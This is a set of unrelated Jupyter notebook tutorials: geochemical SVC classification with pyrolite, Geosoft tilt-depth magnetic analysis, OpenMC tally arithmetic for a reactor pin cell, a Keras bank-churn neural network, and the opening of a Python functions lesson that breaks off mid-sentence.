``` from sklearn.compose import ColumnTransformer from pyrolite.util.skl.transform import CLRTransform, LogTransform # transform the abudnances and isotope ratios differently - accounting for their compositional and log-normal distributions, repsectively transform = ColumnTransformer([("abundances", CLRTransform(), abundances), ("isotopes", LogTransform(), isotopes)]) # make a scaler, as before scaler = StandardScaler() # build a one-versus-others radial basis function SVC which is calibrated for probabilistic output, and balances performance across classes clf = SVC(kernel="rbf", decision_function_shape="ovo", probability=True, class_weight="balanced") # put these together in a pipeline pipeline = make_pipeline(transform, scaler, clf) pipeline ``` Now we can put this in our gridsearch: ``` from sklearn.model_selection import StratifiedKFold, GridSearchCV param_grid = dict(svc__gamma=np.logspace(-2.3, -0.85, 8), svc__C=np.logspace(-0.5, 2.5, 8)) # limit C parameter to avoid overfitting gs = GridSearchCV(estimator=pipeline, param_grid=param_grid, cv=StratifiedKFold(n_splits=6, shuffle=True), n_jobs=4, verbose=3) gs ``` From here we'll train the various models over the parameter grid (building 64 different models, each 6 times): ``` gs.fit(X_train, y_train) ``` ## How does our model perform? We can see that our model performs slightly better: ``` gridscore = gs.score(X_test, y_test) "Overall Accuracy: {:.1f}%".format(gridscore*100) ``` But more importantly, the model should be more generalizable, and should have more balanced performance across our classes. To look at this in a little more detail, we can examine the confusion matrices for each of our models - which examines how samples from the test set were predicted to fall, compared to their true classes. One thing to note here is that where samples are incorrectly classified, they tend to be incorrectly classified as from similar tectonic settings. 
For example, back arc basin related samples are relatively commonly incorrectly classified as being from island arcs, intra-oceanic arcs and mid ocean ridges; all of these have geological and geochemical similarities to the back arc basin samples. ``` import matplotlib.pyplot as plt from pyrolite.util.skl.vis import plot_confusion_matrix fig, ax = plt.subplots(1, 2, figsize=(12, 5)) plot_confusion_matrix(svc_pipeline, X_test, y_test, normalize=True, ax=ax[0]) plot_confusion_matrix(gs.best_estimator_, X_test, y_test, normalize=True, ax=ax[1]) ax[0].set_title('Simple Pipeline') ax[1].set_title('Customised Pipeline') ``` ## How does this compare to a graphical classification equivalent? Revisiting the original scenario we described above, we can examine how our classifier does compared to e.g. the Pearce Th-Nb-Yb diagram at discriminating tectonic settings: ``` from pyrolite.plot.color import process_color from pyrolite.plot.templates import pearceThNbYb from pyrolite.util.plot.legend import proxy_line fig, ax = plt.subplots(1, figsize=(10, 6)) pearceThNbYb(ax) colors = process_color(gs.best_estimator_.predict(X.loc[:, abundances + isotopes]), cmap='tab10', alpha=0.8)['c'] for ID in df.Cluster_ID.unique(): subdf = df.loc[df.Cluster_ID==ID, :] subdf[['Nb/Yb', 'Th/Yb']].pyroplot.scatter(c=colors[df.Cluster_ID==ID], ax=ax, s=10, alpha=0.7) ax.legend([proxy_line(c=coll.get_facecolors()[0], marker='o', ls='none') for coll in ax.collections], df.Cluster_ID.unique(), frameon=False, facecolor=None) plt.show() ``` ## Probabilistic Outputs As we briefly mentioned above, we've used a probabilistic version of an SVC model (calibrated using Platt scaling) to provide some probabilistic classification outputs. We can examine what these look like for a selection of samples from the independent test set compared to their true tectonic settings. 
``` samples = np.random.choice(np.arange(X_test.shape[0]), 8, replace=False) probs = ( pd.DataFrame( data=gs.best_estimator_.predict_proba(X_test.iloc[samples]), columns=gs.best_estimator_.classes_, ) * 100 ) probs["True Tectonic Setting"] = y_test.iloc[samples].tolist() table = probs[probs.columns[::-1]].round(2) table.style.background_gradient(cmap="Blues", axis=1) ``` While most of these are likely to be correctly classified - this provides some information which could be used to better understand the realistic performance of the model itself, as well as provide measures which can be linked to classificaiton uncertainty (get in touch if you want to know more on this front!). ## How can someone else use this on their own data? While it's great to be able to build your own models, you'll likely eventually want to share your workflow and potentially the models themselves (perhaps even to put it into an app!). In the first instance, you could easily share and re-use this notebook with someone else - and that's a great first step! Beyond this, to make it reproducible, you should also provide some information to control the enviornment in which models are being built - like the versions of the packages you're using, system the models are build on, and the 'version' of the notebook which is used. Others could then re-train a model with your data, or create a new model using your workflow with their own data. You can also save your models to disk and share them with others such that they can be loaded directly. 
For example, you can save either the model, pipeline or entire ensemble of models from our gridsearch: ``` import joblib joblib.dump(gs.best_estimator_, './pipeline.pkl') # just save the best pipeline joblib.dump(gs, './gridsearch.pkl') # save all the pipelines ``` And then load them back in: ``` gs = joblib.load('./gridsearch.pkl') estimator = joblib.load('./pipeline.pkl') estimator ``` The serialization of trained models and entire pipelines allows the models themselves (and the preprocessing steps) to be effectively reused. ## Beyond A Prototype While we've put things togtether in a Jupyter notebook, eventually you might want to put this workflow together as a function which you might store in a separate `.py` file such that it can be imported and more easily referenced, versioned and adapted.
github_jupyter
Copyright (c) 2018 [Geosoft Inc.](geosoft.com) https://github.com/GeosoftInc/gxpy/blob/master/README.md [BSD 2-clause License](https://github.com/GeosoftInc/gxpy/blob/master/LICENSE) # Tilt Depth The depth to magnetic sources from the edges of magnetic features can be determined from the reciprocal of the gradient of the tilt angle at the zero-crossover. The `geosoft.gxpy.grid_utility.tilt_depth` makes this calculation and returns a set of (x, y, z) locations that represent magnetic depth. Reference: [Salem et al, 2008, Interpretation of magnetic data using tilt-angle derivatives](https://www.researchgate.net/publication/236873389_Interpretation_of_magnetic_data_using_tilt-angle_derivatives) The procedure implemented in Geosoft follows a process developed by Blakely, 2016. 1. [TMI Grid](#TMI-Grid) 2. [Calculate the depth from the tilt-angle and tilt-derivative](#Calculate the depth from the tilt-angle and tilt-derivative) 3. [Plot depths as coloured symbols](#Plot-depths-as-coloured-symbols) ## TMI Grid This is Total Magnetic Intensity (TMI) data from the Black Hills Norite in South Australia. Reference: https://doi.org/10.1071/ASEG2016ab115 ``` import geosoft.gxpy.gx as gx import geosoft.gxpy.utility as gxu import geosoft.gxpy.grid as gxgrd import geosoft.gxpy.grid_utility as gxgrdu import geosoft.gxpy.map as gxmap import geosoft.gxpy.view as gxview import geosoft.gxpy.group as gxgrp import numpy as np from IPython.display import Image gxc = gx.GXpy() gxu.check_version('9.4.0b0') # get the sample data from github url = 'https://github.com/GeosoftInc/gxpy/raw/master/examples/data/' grid = 'bhn_tmi_250m.grd' gxu.url_retrieve(url + grid) gxu.url_retrieve(url + grid + '.gi') gxu.url_retrieve(url + grid + '.xml') grd = gxgrd.Grid.open(grid) Image(grd.image_file(shade=True, pix_width=500)) ``` ## Calculate the depth from the tilt-angle and tilt-derivative The depth is the reciprocal of the horizontal gradient at the zero-contour of the tilt-angle. 
```
# Compute depth-to-source solutions from the tilt-angle zero-crossovers.
# Per the Salem et al. (2008) method, tilt_depth() returns a set of
# (x, y, z) locations representing depth to magnetic sources.
td_pp = gxgrdu.tilt_depth(grd)
```

## Plot depths as coloured symbols

```
# Create a map figure sized to the extent of the depth solutions.
with gxmap.Map.figure(td_pp.extent_xy,
                      title='Depth from Tilt-Derivative',
                      margins=(1, 3.5, 3, 1)) as gmap:

    map_file = gmap.file_name

    with gxview.View.open(gmap, "data") as v:

        # Colour map for the symbols, labelled with the depth unit of measure.
        cmap = gxgrp.Color_map(title='depth',
                               unit_of_measure=td_pp.coordinate_system.unit_of_measure)
        # Third column of the point set holds the depth values; drop NaNs
        # before working out the colour range.
        depths = td_pp.pp[:,2]
        depths = depths[~np.isnan(depths)]
        # Clip the colour scale at 2000 to keep shallow structure visible;
        # np.max(depths) would instead scale to the deepest solution.
        cmap.set_linear(np.min(depths), 2000) # np.max(depths))
        gxgrp.Color_symbols_group.new(v, 'tilt-depth', td_pp.pp, cmap)

        # Add a colour-bar legend for the depth scale.
        gxgrp.legend_color_bar(v, 'depth_legend', cmap=cmap)

# Render the finished map (the map file is closed on exit from the with-block).
Image(gxmap.Map.open(map_file).image_file(pix_width=800))
```
github_jupyter
# Tally Arithmetic This notebook shows the how tallies can be combined (added, subtracted, multiplied, etc.) using the Python API in order to create derived tallies. Since no covariance information is obtained, it is assumed that tallies are completely independent of one another when propagating uncertainties. The target problem is a simple pin cell. ``` import glob from IPython.display import Image import numpy as np import openmc ``` ## Generate Input Files First we need to define materials that will be used in the problem. We'll create three materials for the fuel, water, and cladding of the fuel pin. ``` # 1.6 enriched fuel fuel = openmc.Material(name='1.6% Fuel') fuel.set_density('g/cm3', 10.31341) fuel.add_nuclide('U235', 3.7503e-4) fuel.add_nuclide('U238', 2.2625e-2) fuel.add_nuclide('O16', 4.6007e-2) # borated water water = openmc.Material(name='Borated Water') water.set_density('g/cm3', 0.740582) water.add_nuclide('H1', 4.9457e-2) water.add_nuclide('O16', 2.4732e-2) water.add_nuclide('B10', 8.0042e-6) # zircaloy zircaloy = openmc.Material(name='Zircaloy') zircaloy.set_density('g/cm3', 6.55) zircaloy.add_nuclide('Zr90', 7.2758e-3) ``` With our three materials, we can now create a materials file object that can be exported to an actual XML file. ``` # Instantiate a Materials collection materials_file = openmc.Materials([fuel, water, zircaloy]) # Export to "materials.xml" materials_file.export_to_xml() ``` Now let's move on to the geometry. Our problem will have three regions for the fuel, the clad, and the surrounding coolant. The first step is to create the bounding surfaces -- in this case two cylinders and six planes. 
``` # Create cylinders for the fuel and clad fuel_outer_radius = openmc.ZCylinder(x0=0.0, y0=0.0, r=0.39218) clad_outer_radius = openmc.ZCylinder(x0=0.0, y0=0.0, r=0.45720) # Create boundary planes to surround the geometry # Use both reflective and vacuum boundaries to make life interesting min_x = openmc.XPlane(x0=-0.63, boundary_type='reflective') max_x = openmc.XPlane(x0=+0.63, boundary_type='reflective') min_y = openmc.YPlane(y0=-0.63, boundary_type='reflective') max_y = openmc.YPlane(y0=+0.63, boundary_type='reflective') min_z = openmc.ZPlane(z0=-100., boundary_type='vacuum') max_z = openmc.ZPlane(z0=+100., boundary_type='vacuum') ``` With the surfaces defined, we can now create cells that are defined by intersections of half-spaces created by the surfaces. ``` # Create a Universe to encapsulate a fuel pin pin_cell_universe = openmc.Universe(name='1.6% Fuel Pin') # Create fuel Cell fuel_cell = openmc.Cell(name='1.6% Fuel') fuel_cell.fill = fuel fuel_cell.region = -fuel_outer_radius pin_cell_universe.add_cell(fuel_cell) # Create a clad Cell clad_cell = openmc.Cell(name='1.6% Clad') clad_cell.fill = zircaloy clad_cell.region = +fuel_outer_radius & -clad_outer_radius pin_cell_universe.add_cell(clad_cell) # Create a moderator Cell moderator_cell = openmc.Cell(name='1.6% Moderator') moderator_cell.fill = water moderator_cell.region = +clad_outer_radius pin_cell_universe.add_cell(moderator_cell) ``` OpenMC requires that there is a "root" universe. Let us create a root cell that is filled by the pin cell universe and then assign it to the root universe. 
``` # Create root Cell root_cell = openmc.Cell(name='root cell') root_cell.fill = pin_cell_universe # Add boundary planes root_cell.region = +min_x & -max_x & +min_y & -max_y & +min_z & -max_z # Create root Universe root_universe = openmc.Universe(universe_id=0, name='root universe') root_universe.add_cell(root_cell) ``` We now must create a geometry that is assigned a root universe, put the geometry into a geometry file, and export it to XML. ``` # Create Geometry and set root Universe geometry = openmc.Geometry(root_universe) # Export to "geometry.xml" geometry.export_to_xml() ``` With the geometry and materials finished, we now just need to define simulation parameters. In this case, we will use 5 inactive batches and 15 active batches each with 2500 particles. ``` # OpenMC simulation parameters batches = 20 inactive = 5 particles = 2500 # Instantiate a Settings object settings_file = openmc.Settings() settings_file.batches = batches settings_file.inactive = inactive settings_file.particles = particles settings_file.output = {'tallies': True} # Create an initial uniform spatial source distribution over fissionable zones bounds = [-0.63, -0.63, -100., 0.63, 0.63, 100.] uniform_dist = openmc.stats.Box(bounds[:3], bounds[3:], only_fissionable=True) settings_file.source = openmc.Source(space=uniform_dist) # Export to "settings.xml" settings_file.export_to_xml() ``` Let us also create a plot file that we can use to verify that our pin cell geometry was created successfully. ``` # Instantiate a Plot plot = openmc.Plot(plot_id=1) plot.filename = 'materials-xy' plot.origin = [0, 0, 0] plot.width = [1.26, 1.26] plot.pixels = [250, 250] plot.color_by = 'material' # Show plot openmc.plot_inline(plot) ``` As we can see from the plot, we have a nice pin cell with fuel, cladding, and water! Before we run our simulation, we need to tell the code what we want to tally. The following code shows how to create a variety of tallies. 
``` # Instantiate an empty Tallies object tallies_file = openmc.Tallies() # Create Tallies to compute microscopic multi-group cross-sections # Instantiate energy filter for multi-group cross-section Tallies energy_filter = openmc.EnergyFilter([0., 0.625, 20.0e6]) # Instantiate flux Tally in moderator and fuel tally = openmc.Tally(name='flux') tally.filters = [openmc.CellFilter([fuel_cell, moderator_cell])] tally.filters.append(energy_filter) tally.scores = ['flux'] tallies_file.append(tally) # Instantiate reaction rate Tally in fuel tally = openmc.Tally(name='fuel rxn rates') tally.filters = [openmc.CellFilter(fuel_cell)] tally.filters.append(energy_filter) tally.scores = ['nu-fission', 'scatter'] tally.nuclides = ['U238', 'U235'] tallies_file.append(tally) # Instantiate reaction rate Tally in moderator tally = openmc.Tally(name='moderator rxn rates') tally.filters = [openmc.CellFilter(moderator_cell)] tally.filters.append(energy_filter) tally.scores = ['absorption', 'total'] tally.nuclides = ['O16', 'H1'] tallies_file.append(tally) # Instantiate a tally mesh mesh = openmc.RegularMesh(mesh_id=1) mesh.dimension = [1, 1, 1] mesh.lower_left = [-0.63, -0.63, -100.] mesh.width = [1.26, 1.26, 200.] meshsurface_filter = openmc.MeshSurfaceFilter(mesh) # Instantiate thermal, fast, and total leakage tallies leak = openmc.Tally(name='leakage') leak.filters = [meshsurface_filter] leak.scores = ['current'] tallies_file.append(leak) thermal_leak = openmc.Tally(name='thermal leakage') thermal_leak.filters = [meshsurface_filter, openmc.EnergyFilter([0., 0.625])] thermal_leak.scores = ['current'] tallies_file.append(thermal_leak) fast_leak = openmc.Tally(name='fast leakage') fast_leak.filters = [meshsurface_filter, openmc.EnergyFilter([0.625, 20.0e6])] fast_leak.scores = ['current'] tallies_file.append(fast_leak) # K-Eigenvalue (infinity) tallies fiss_rate = openmc.Tally(name='fiss. rate') abs_rate = openmc.Tally(name='abs. 
rate') fiss_rate.scores = ['nu-fission'] abs_rate.scores = ['absorption'] tallies_file += (fiss_rate, abs_rate) # Resonance Escape Probability tallies therm_abs_rate = openmc.Tally(name='therm. abs. rate') therm_abs_rate.scores = ['absorption'] therm_abs_rate.filters = [openmc.EnergyFilter([0., 0.625])] tallies_file.append(therm_abs_rate) # Thermal Flux Utilization tallies fuel_therm_abs_rate = openmc.Tally(name='fuel therm. abs. rate') fuel_therm_abs_rate.scores = ['absorption'] fuel_therm_abs_rate.filters = [openmc.EnergyFilter([0., 0.625]), openmc.CellFilter([fuel_cell])] tallies_file.append(fuel_therm_abs_rate) # Fast Fission Factor tallies therm_fiss_rate = openmc.Tally(name='therm. fiss. rate') therm_fiss_rate.scores = ['nu-fission'] therm_fiss_rate.filters = [openmc.EnergyFilter([0., 0.625])] tallies_file.append(therm_fiss_rate) # Instantiate energy filter to illustrate Tally slicing fine_energy_filter = openmc.EnergyFilter(np.logspace(np.log10(1e-2), np.log10(20.0e6), 10)) # Instantiate flux Tally in moderator and fuel tally = openmc.Tally(name='need-to-slice') tally.filters = [openmc.CellFilter([fuel_cell, moderator_cell])] tally.filters.append(fine_energy_filter) tally.scores = ['nu-fission', 'scatter'] tally.nuclides = ['H1', 'U238'] tallies_file.append(tally) # Export to "tallies.xml" tallies_file.export_to_xml() ``` Now we a have a complete set of inputs, so we can go ahead and run our simulation. ``` # Run OpenMC! openmc.run() ``` ## Tally Data Processing Our simulation ran successfully and created a statepoint file with all the tally data in it. We begin our analysis here loading the statepoint file and 'reading' the results. By default, the tally results are not read into memory because they might be large, even large enough to exceed the available memory on a computer. 
``` # Load the statepoint file sp = openmc.StatePoint('statepoint.20.h5') ``` We have a tally of the total fission rate and the total absorption rate, so we can calculate k-eff as: $$k_{eff} = \frac{\langle \nu \Sigma_f \phi \rangle}{\langle \Sigma_a \phi \rangle + \langle L \rangle}$$ In this notation, $\langle \cdot \rangle^a_b$ represents an OpenMC that is integrated over region $a$ and energy range $b$. If $a$ or $b$ is not reported, it means the value represents an integral over all space or all energy, respectively. ``` # Get the fission and absorption rate tallies fiss_rate = sp.get_tally(name='fiss. rate') abs_rate = sp.get_tally(name='abs. rate') # Get the leakage tally leak = sp.get_tally(name='leakage') leak = leak.summation(filter_type=openmc.MeshSurfaceFilter, remove_filter=True) # Compute k-infinity using tally arithmetic keff = fiss_rate / (abs_rate + leak) keff.get_pandas_dataframe() ``` Notice that even though the neutron production rate, absorption rate, and current are separate tallies, we still get a first-order estimate of the uncertainty on the quotient of them automatically! Often in textbooks you'll see k-eff represented using the six-factor formula $$k_{eff} = p \epsilon f \eta P_{FNL} P_{TNL}.$$ Let's analyze each of these factors, starting with the resonance escape probability which is defined as $$p=\frac{\langle\Sigma_a\phi\rangle_T + \langle L \rangle_T}{\langle\Sigma_a\phi\rangle + \langle L \rangle_T}$$ where the subscript $T$ means thermal energies. ``` # Compute resonance escape probability using tally arithmetic therm_abs_rate = sp.get_tally(name='therm. abs. 
rate') thermal_leak = sp.get_tally(name='thermal leakage') thermal_leak = thermal_leak.summation(filter_type=openmc.MeshSurfaceFilter, remove_filter=True) res_esc = (therm_abs_rate + thermal_leak) / (abs_rate + thermal_leak) res_esc.get_pandas_dataframe() ``` The fast fission factor can be calculated as $$\epsilon=\frac{\langle\nu\Sigma_f\phi\rangle}{\langle\nu\Sigma_f\phi\rangle_T}$$ ``` # Compute fast fission factor factor using tally arithmetic therm_fiss_rate = sp.get_tally(name='therm. fiss. rate') fast_fiss = fiss_rate / therm_fiss_rate fast_fiss.get_pandas_dataframe() ``` The thermal flux utilization is calculated as $$f=\frac{\langle\Sigma_a\phi\rangle^F_T}{\langle\Sigma_a\phi\rangle_T}$$ where the superscript $F$ denotes fuel. ``` # Compute thermal flux utilization factor using tally arithmetic fuel_therm_abs_rate = sp.get_tally(name='fuel therm. abs. rate') therm_util = fuel_therm_abs_rate / therm_abs_rate therm_util.get_pandas_dataframe() ``` The next factor is the number of fission neutrons produced per absorption in fuel, calculated as $$\eta = \frac{\langle \nu\Sigma_f\phi \rangle_T}{\langle \Sigma_a \phi \rangle^F_T}$$ ``` # Compute neutrons produced per absorption (eta) using tally arithmetic eta = therm_fiss_rate / fuel_therm_abs_rate eta.get_pandas_dataframe() ``` There are two leakage factors to account for fast and thermal leakage. 
The fast non-leakage probability is computed as $$P_{FNL} = \frac{\langle \Sigma_a\phi \rangle + \langle L \rangle_T}{\langle \Sigma_a \phi \rangle + \langle L \rangle}$$ ``` p_fnl = (abs_rate + thermal_leak) / (abs_rate + leak) p_fnl.get_pandas_dataframe() ``` The final factor is the thermal non-leakage probability and is computed as $$P_{TNL} = \frac{\langle \Sigma_a\phi \rangle_T}{\langle \Sigma_a \phi \rangle_T + \langle L \rangle_T}$$ ``` p_tnl = therm_abs_rate / (therm_abs_rate + thermal_leak) p_tnl.get_pandas_dataframe() ``` Now we can calculate $k_{eff}$ using the product of the factors form the four-factor formula. ``` keff = res_esc * fast_fiss * therm_util * eta * p_fnl * p_tnl keff.get_pandas_dataframe() ``` We see that the value we've obtained here has exactly the same mean as before. However, because of the way it was calculated, the standard deviation appears to be larger. Let's move on to a more complicated example now. Before we set up tallies to get reaction rates in the fuel and moderator in two energy groups for two different nuclides. We can use tally arithmetic to divide each of these reaction rates by the flux to get microscopic multi-group cross sections. ``` # Compute microscopic multi-group cross-sections flux = sp.get_tally(name='flux') flux = flux.get_slice(filters=[openmc.CellFilter], filter_bins=[(fuel_cell.id,)]) fuel_rxn_rates = sp.get_tally(name='fuel rxn rates') mod_rxn_rates = sp.get_tally(name='moderator rxn rates') fuel_xs = fuel_rxn_rates / flux fuel_xs.get_pandas_dataframe() ``` We see that when the two tallies with multiple bins were divided, the derived tally contains the outer product of the combinations. If the filters/scores are the same, no outer product is needed. The `get_values(...)` method allows us to obtain a subset of tally scores. In the following example, we obtain just the neutron production microscopic cross sections. ``` # Show how to use Tally.get_values(...) 
with a CrossScore nu_fiss_xs = fuel_xs.get_values(scores=['(nu-fission / flux)']) print(nu_fiss_xs) ``` The same idea can be used not only for scores but also for filters and nuclides. ``` # Show how to use Tally.get_values(...) with a CrossScore and CrossNuclide u235_scatter_xs = fuel_xs.get_values(nuclides=['(U235 / total)'], scores=['(scatter / flux)']) print(u235_scatter_xs) # Show how to use Tally.get_values(...) with a CrossFilter and CrossScore fast_scatter_xs = fuel_xs.get_values(filters=[openmc.EnergyFilter], filter_bins=[((0.625, 20.0e6),)], scores=['(scatter / flux)']) print(fast_scatter_xs) ``` A more advanced method is to use `get_slice(...)` to create a new derived tally that is a subset of an existing tally. This has the benefit that we can use `get_pandas_dataframe()` to see the tallies in a more human-readable format. ``` # "Slice" the nu-fission data into a new derived Tally nu_fission_rates = fuel_rxn_rates.get_slice(scores=['nu-fission']) nu_fission_rates.get_pandas_dataframe() # "Slice" the H-1 scatter data in the moderator Cell into a new derived Tally need_to_slice = sp.get_tally(name='need-to-slice') slice_test = need_to_slice.get_slice(scores=['scatter'], nuclides=['H1'], filters=[openmc.CellFilter], filter_bins=[(moderator_cell.id,)]) slice_test.get_pandas_dataframe() ```
github_jupyter
# Artificial Neural Network in Python with Keras In this program we construct an Artificial Neuron Network model. The aim is to build a classification model to predict if a certain customer will leave the bank services in the six months. **Dataset Description** For this problem we have a Dataset composed by 10000 instances (rows) and 14 features (columns). As the objective is to predict the probability of a client will leave the bank service, in our dataset the last column corresponds to the response. The others columns are the features (independent variables) that we consider to build and training the model, these columns are: RowNumber, CustomerId, Surname, CreditScore, Geography, Gender, Age, Tenure, Balance, NumOfProducts, HasCrCard, IsActiveMember, EstimatedSalary, Exited. ## Importing Libraries ``` import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns ``` ## Importing the Dataset ``` dataset = pd.read_csv('Churn_Modelling.csv') dataset.head() ``` ### Visualizing the categorical variables ``` dataset['Gender'].value_counts() dataset['Gender'].value_counts().plot.bar() dataset.Geography.value_counts() dataset.Geography.value_counts().plot.bar() ``` ### Visualizing the Numerical Variables ``` dataset['Age'].hist(bins=10) dataset.dtypes sns.pairplot(dataset, hue = 'Exited', vars = ['CreditScore', 'Age', 'Balance', 'EstimatedSalary'] ) ``` ### Correlation with the response variable ``` dataset_n = dataset.drop(columns=['RowNumber', 'CustomerId', 'Surname', 'Geography', 'Gender', 'Tenure', 'NumOfProducts', 'HasCrCard', 'IsActiveMember', 'Exited']) dataset_n.corrwith(dataset.Exited).plot.bar( figsize = (20, 10), title = "Correlation with Exited", fontsize = 15, rot = 45, grid = True) ``` ### Correlation Between Numerical Variables ``` ## Correlation Matrix sns.set(style="white") # Compute the correlation matrix corr = dataset_n.corr() # Generate a mask for the upper triangle mask = np.zeros_like(corr, dtype=np.bool) 
mask[np.triu_indices_from(mask)] = True # Set up the matplotlib figure f, ax = plt.subplots(figsize=(10, 20)) # Generate a custom diverging colormap cmap = sns.diverging_palette(220, 10, as_cmap=True) # Draw the heatmap with the mask and correct aspect ratio sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.1, center=0, square=True, linewidths=.5, cbar_kws={"shrink": .5}, annot = True) ``` ### Feature Engineering ``` sns.histplot(data=dataset, x='Age', hue='Exited', kde = True) sns.histplot(data=dataset[dataset['Exited'] == 1], x='Age', hue='Exited', bins = 7, kde = True) sns.histplot(data=dataset[dataset['Exited'] == 0], x='Age', hue='Exited', bins = 6, kde = True) def category_age(Age): if (Age <=28): return 0 elif(Age > 28) & (Age <= 38): return 1 elif(Age > 38) & (Age <= 58): return 2 #elif(Age > 40) & (Age <= 50): # return 3 #elif(Age > 50) & (Age <= 60): # return 4 else: return 3 #dataset['Age'] = dataset['Age'].map(category_age) dataset[dataset['Exited'] == 1]['Age'].value_counts() sns.histplot(data=dataset[dataset['Exited'] == 1], x='Age', hue='Exited', kde = True) dataset.columns ``` ### Excluding not important columns ``` dataset = dataset.drop(columns=['RowNumber', 'CustomerId', 'Surname']) ``` ### Encoding Categorical Data ``` dataset['Gender'] = dataset['Gender'].astype('category').cat.codes ``` ### One Hot Econding ``` dataset = pd.get_dummies(dataset) dataset.head() response = dataset['Exited'] dataset = dataset.drop(columns=['Exited']) response.head() ``` ### Splitting the Dataset into train and test set ``` from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(dataset, response, test_size = 0.2, random_state = 0) ``` ### Feature Scaling In almost ANN models we must to apply feature scale. 
``` from sklearn.preprocessing import StandardScaler sc_X = StandardScaler() X_train_bckp = pd.DataFrame(sc_X.fit_transform(X_train)) X_test_bckp = pd.DataFrame(sc_X.transform(X_test)) X_train_bckp.columns = X_train.columns.values X_test_bckp.columns = X_test.columns.values X_train_bckp.index = X_train.index.values X_test_bckp.index = X_test.index.values X_train = X_train_bckp X_test = X_test_bckp ``` ## Building the Neural Networks EXPLAIN IN MORE DETAIL WHAT IS AN ANN, WHICH STEP WE NEED AND SO ON ### Importing the Keras library ``` import keras from keras.models import Sequential # To initialize the ANN from keras.layers import Dense # To creat the hidden layers ``` ### Initiating the ANN ``` classifier = Sequential() # To initiate the ANN ``` ### Creating the Layers ``` classifier.add(Dense(units=6, activation='relu', kernel_initializer= 'uniform', input_dim=X_train.shape[1])) # Creating the hidden layer classifier.add(Dense(units=6, activation='relu', kernel_initializer= 'uniform')) # Creating the hidden layer classifier.add(Dense(units=1, activation='sigmoid', kernel_initializer= 'uniform')) # Creating the hidden layer ``` ### Compiling the ANN ``` classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) ``` ## Training the ANN ``` classifier.fit(X_train, y_train, batch_size=32, epochs=100) ``` ### Predicting a New Result ``` y_pred = classifier.predict(X_test) y_pred = (y_pred > 0.5) ``` ### Making the Confusion Matrix ``` from sklearn.metrics import confusion_matrix, accuracy_score cm = confusion_matrix(y_test, y_pred) print(cm) accuracy_score(y_test, y_pred) score_train = classifier.evaluate(X_train, y_train) score_test = classifier.evaluate(X_test, y_test) print(score_train) print(score_test) ``` ## Evaluating the model Here we are going to proceed with a k-fold cross validation. We need to create a new function. 
```
def build_classifier(optimizer='adam'):
    """Build and compile the ANN.

    KerasClassifier requires a zero-side-effect builder function so the
    same architecture can be re-created for every cross-validation fold
    and every grid-search candidate.

    Parameters
    ----------
    optimizer : str, the Keras optimizer name (tunable via GridSearchCV)

    Returns
    -------
    classifier : compiled keras Sequential model
    """
    classifier = Sequential()
    # input_dim must match the number of features in the (scaled) training
    # set; X_train is the scaled feature DataFrame created above.
    classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu', input_dim = X_train.shape[1]))
    classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu'))
    # Sigmoid output for binary classification (churn probability).
    classifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))
    classifier.compile(optimizer = optimizer, loss = 'binary_crossentropy', metrics = ['accuracy'])
    return classifier
```

### K-Fold Cross Validation

```
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import cross_val_score

# Wrap the Keras builder so scikit-learn utilities can drive it.
classifier = KerasClassifier(build_fn = build_classifier, batch_size = 32, epochs = 100)
# 10-fold cross validation; n_jobs = -1 uses all available CPU cores.
accuracies = cross_val_score(estimator = classifier, X = X_train, y = y_train, cv = 10, n_jobs = -1)
mean = accuracies.mean()
variance = accuracies.std()
print(mean)
print(variance)
```

## Tuning the Model

```
from sklearn.model_selection import GridSearchCV

classifier = KerasClassifier(build_fn = build_classifier)
# Hyperparameter grid: 4 batch sizes x 2 epoch counts x 2 optimizers.
parameters = {'batch_size': [8, 16, 32, 64],
              'epochs': [100, 500],
              'optimizer': ['adam', 'rmsprop']}
grid_search = GridSearchCV(estimator = classifier,
                           param_grid = parameters,
                           scoring = 'accuracy',
                           cv = 10,
                           n_jobs = -1)
grid_search = grid_search.fit(X_train, y_train)
best_parameters = grid_search.best_params_
best_accuracy = grid_search.best_score_
print(best_parameters)
print(best_accuracy)
```
github_jupyter
# Writing Functions in Python **by [Richard W. Evans](https://sites.google.com/site/rickecon/), June 2019** Python has many [built-in functions](https://docs.python.org/3/library/functions.html). Functions are objects that accept a specific set of inputs, perform operations on those inputs, and return a set of outputs based on those inputs. Python is a language that focuses on functions. Further, the importing of packages expands the set of functions available to the user. In this notebook, we learn the basics of writing a function in Python, some best practices about docstrings and documentation, and some of the art of using functions to make your code modular. **Modularity** of code is the principle of writing functions for operations that occur multiple times so that a change to that operation only has to be changed once in the code rather than in every instance of the operation. Furthermore, the principle of code modularity also make it easier to take pieces of your code and plug them into other projects as well as combining other projects with your code. ## 1. The form of a Python function You can define a function in a Python module or script by using the `def` keyword followed by the function name, a parenthesized list of inputs, and a colon `:`. You then include the operations you want your function to perform by typing lines of executable code, each of which begins with an indent of four spaces. Finally, if you want your function to return any objects, those objects are listed in a comma-separated list following the `return` keyword as the last indented line of the function. The following function concatenates two strings into one string. ``` def string2together(str1, str2): ''' -------------------------------------------------------------------- This function concatenates two strings as one string with a space separating them. 
-------------------------------------------------------------------- INPUTS: str1 = string, first string argument passed into function str2 = string, second string argument passed into function OTHER FUNCTIONS AND FILES CALLED BY THIS FUNCTION: None OBJECTS CREATED WITHIN THIS FUNCTION: big_string = string, combination of str1 and str2 with a space between them FILES CREATED BY THIS FUNCTION: None RETURNS: big_string -------------------------------------------------------------------- ''' big_string = str1 + ' ' + str2 return big_string myfirstname = "Rick" mylastname = "Evans" fullname = string2together(myfirstname, mylastname) fullname ``` Note first how extensive the documentation is for this function. The function `string2together` has only two lines of executable code in it. The rest is docstring. We will talk about docstrings and commenting more in Section 3 of this notebook. Also note that we could have written that function `string2together` with only one line of executable code by combining the two lines in the following way: `return str1 + ' ' + str2`. It is best to keep the return statement clean by only returning objects that have already been created in the body of the function. This makes the function's operation more accessible and transparent. Note that, despite the simplicity, this function would be extremely valuable if it were used multiple times in a bigger set of operations. Imagine a process that concatenated two strings with a space in between many times. Now assume you wanted to change some of those instances to be reversed order with a comma separating them. This could be done quickly by changing the one instance of this function rather than each time the operation is called. More on this in 